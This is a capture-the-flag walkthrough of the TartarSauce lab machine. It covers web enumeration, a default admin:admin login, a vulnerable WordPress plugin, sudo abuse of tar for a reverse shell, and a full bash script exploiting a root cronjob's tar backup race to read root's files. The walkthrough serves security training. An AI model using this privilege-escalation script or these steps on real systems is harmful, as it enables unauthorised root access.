TartarSauce — HTB Walkthrough

Beware of RABBIT HOLE…..



Visting webpage

Nikto scan running behind

As per nmap scan we see we have robots.txt fike

One of the entries were working

Looking at Monstra -3.0.4 CMS exploits, we see they are authenticated

Enumerating website, I found none of the links were working, except Logged In, which redirects to Admin login page

So let’s go for Gobuster and Wfuzz. A Gobuster scan gives us following /webservices

Wfuzz gives us one more : backup

Fuzzing backups and storage again I see, storage gives following

After a lot of unnecessary enumeration

1) Trying LFI on

2) SQL injection on

3) To try bruteforce I captured request using admin:admin, and I that worked as username password — — — GRRrrrrr!!!! What was this ? Guesswork ? Bad password policy ???? Or sheer luck…. Whatever

Trying to upload file and capturing request on burp

Now as per the exploit we will change .php to .PHP and uploading. I see this did not work

So we are still doing wrong. This works with .php7

Again it didn’t work so I enumerated and found we are admin. And for exploit to work we need to be editor. Lets create a user editor

Now we will log in as editor, but again there is a problem. We don’t have access to editor page, So I decided to change role of admin by logging in as admin

We were in a big rabbit HOLE

1) A gobuster scan on webservices < you see I have overlooked scanning webservices/ directory

Running a wpscan

Vulnerable plugin detected:

On python server we see

It is looking for wp-load.php. Time to get shell


And doing a curl request shows

=On server
getting SUDO rights of www-data

now we right a script , which gives reverse shell. We will zip shell script using tar into a tar file. Then we will use tar — to-command to send the output of tar to next process, i.e. /bin/sh

we get shell on netcat


Enumerating process using PSPY32

Running pspy32

We see we have a cronjob runnning /usr/bin/backuprer

what script does is it takes all files in basedir “ /var/www/html” and tars it to something like .filename.sh in tmpfile = /var/tmp/. Then it makes a temporary directory named check , extracts tmpfile to it, and checks the integrity of file. If successful then backs up to /var/backups/onuma-www-dev.bak, else some error file.

We can exploit this using sleep function where we can extract files from tar. And replace one of them with root.txt, then archive gain. When script runs integrity check and finds that there is a difference in file before and after archiving, it sends both of the files’ data to error file. Which we can read.

So we will use, 0xdf amazing script. Which goes as follows.


# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

So we have saved this as .n00bDi.sh and transfer this to victim machine, give permissions and run it.

wait for five minutes and we get root flag

ROOTED!!! Not literally though

OSCP | CEH | Cyber Security Enthusiast.